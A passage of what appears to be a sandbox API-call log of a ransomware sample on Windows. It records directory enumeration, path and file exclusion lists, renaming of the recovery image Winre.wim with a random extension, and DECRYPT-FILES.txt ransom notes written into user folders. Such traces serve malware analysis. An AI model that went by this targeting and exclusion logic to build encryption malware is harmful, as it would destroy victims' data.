lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.533] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.533] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.533] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.533] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.533] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.533] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.533] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.533] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.533] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.533] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.533] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.533] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.533] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.533] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.533] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.533] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.534] lstrlenW (lpString="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 58 [0076.534] wsprintfW (in: param_1=0x3f2e39c, param_2="%s.%s" | out: param_1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.5e2j5") returned 64 [0076.534] MoveFileExW (lpExistingFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.5e2j5" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.5e2j5"), dwFlags=0x0) returned 1 [0076.537] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.537] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.537] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.538] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0076.538] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0076.538] CloseHandle (hObject=0x420) returned 1 [0076.538] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6cda6a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.538] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.539] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.539] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.539] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.539] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.539] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.539] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.539] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.539] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.539] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.539] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.539] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.539] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.539] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.539] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.539] lstrlenW (lpString="C:\\Recovery\\") returned 12 [0076.539] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.539] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Recovery\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0076.539] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Recovery\\jkbimi8.tmp") returned="C:\\Recovery\\jkbimi8.tmp" [0076.539] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.539] CreateFileW (lpFileName="C:\\Recovery\\jkbimi8.tmp" (normalized: "c:\\recovery\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.540] CloseHandle (hObject=0x0) returned 0 [0076.540] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.540] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6cda6a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.540] FindClose (in: hFindFile=0x5f8bd8 | out: hFindFile=0x5f8bd8) returned 1 [0076.540] CloseHandle (hObject=0x418) returned 1 [0076.541] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0076.541] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0076.541] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0076.541] lstrcatW (in: lpString1="System Volume Information", lpString2="\\" | out: lpString1="System Volume Information\\") returned="System Volume Information\\" [0076.541] lstrcatW (in: lpString1="C:\\", lpString2="System Volume Information\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\Program Files") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch=":\\Windows") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\Games\\") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\All Users") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="AhnLab") returned 0x0 [0076.541] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.541] lstrlenW (lpString="C:\\System Volume Information\\") returned 29 [0076.541] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.541] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\System Volume Information\\\\jkbimi8.tmp") returned 41 [0076.541] CreateFileW (lpFileName="C:\\System Volume Information\\\\jkbimi8.tmp" (normalized: "c:\\system volume information\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0076.545] GetLastError () returned 0x5 [0076.545] lstrlenW (lpString="C:\\System Volume Information\\") returned 29 [0076.545] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.545] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\System Volume Information\\\\DECRYPT-FILES.txt") returned 47 [0076.545] CreateFileW (lpFileName="C:\\System Volume Information\\\\DECRYPT-FILES.txt" (normalized: "c:\\system volume information\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.545] lstrlenW (lpString="C:\\System Volume Information\\") returned 29 [0076.545] lstrcatW (in: lpString1="C:\\System Volume Information\\", lpString2="*" | out: lpString1="C:\\System Volume Information\\*") returned="C:\\System Volume Information\\*" [0076.545] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6cda6a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="苟盅ꀐ썮ϲ")) returned 0xffffffff [0076.546] CloseHandle (hObject=0xffffffff) returned 0 [0076.546] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="Users", cAlternateFileName="")) returned 1 [0076.547] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0076.547] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0076.547] lstrcatW (in: lpString1="Users", lpString2="\\" | out: lpString1="Users\\") returned="Users\\" [0076.547] lstrcatW (in: lpString1="C:\\", lpString2="Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\Program Files") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch=":\\Windows") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\Games\\") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\All Users") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="AhnLab") returned 0x0 [0076.547] StrStrW (lpFirst="C:\\Users\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.547] lstrlenW (lpString="C:\\Users\\") returned 9 [0076.547] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.547] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Users\\\\jkbimi8.tmp") returned 21 [0076.547] CreateFileW (lpFileName="C:\\Users\\\\jkbimi8.tmp" (normalized: "c:\\users\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x418 [0076.548] lstrlenW (lpString="C:\\Users\\") returned 9 [0076.548] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.548] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Users\\\\DECRYPT-FILES.txt") returned 27 [0076.548] CreateFileW (lpFileName="C:\\Users\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.548] lstrlenW (lpString="C:\\Users\\") returned 9 [0076.548] lstrcatW (in: lpString1="C:\\Users\\", lpString2="*" | out: lpString1="C:\\Users\\*") returned="C:\\Users\\*" [0076.548] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8bd8 [0076.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.548] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.548] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.548] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.548] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0076.548] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0076.548] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0076.548] lstrcatW (in: lpString1="5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0076.548] lstrcatW (in: lpString1="C:\\Users\\", lpString2="5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0076.548] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\Program Files") returned 0x0 [0076.548] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch=":\\Windows") returned 0x0 [0076.548] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\Games\\") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\All Users") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="AhnLab") returned 0x0 [0076.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0076.549] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.549] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\\\jkbimi8.tmp") returned 42 [0076.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0076.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0076.549] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.549] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\\\DECRYPT-FILES.txt") returned 48 [0076.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0076.550] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0076.551] CloseHandle (hObject=0x424) returned 1 [0076.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0076.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0076.551] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0076.551] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.551] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.552] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.552] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.552] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0076.552] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0076.552] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0076.552] lstrcatW (in: lpString1="AppData", lpString2="\\" | out: lpString1="AppData\\") returned="AppData\\" [0076.552] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="AppData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\Program Files") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch=":\\Windows") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\Games\\") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\All Users") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="AhnLab") returned 0x0 [0076.552] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.552] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 38 [0076.552] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.552] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\\\jkbimi8.tmp") returned 50 [0076.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0076.553] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 38 [0076.553] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.553] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\\\DECRYPT-FILES.txt") returned 56 [0076.553] CreateFileW 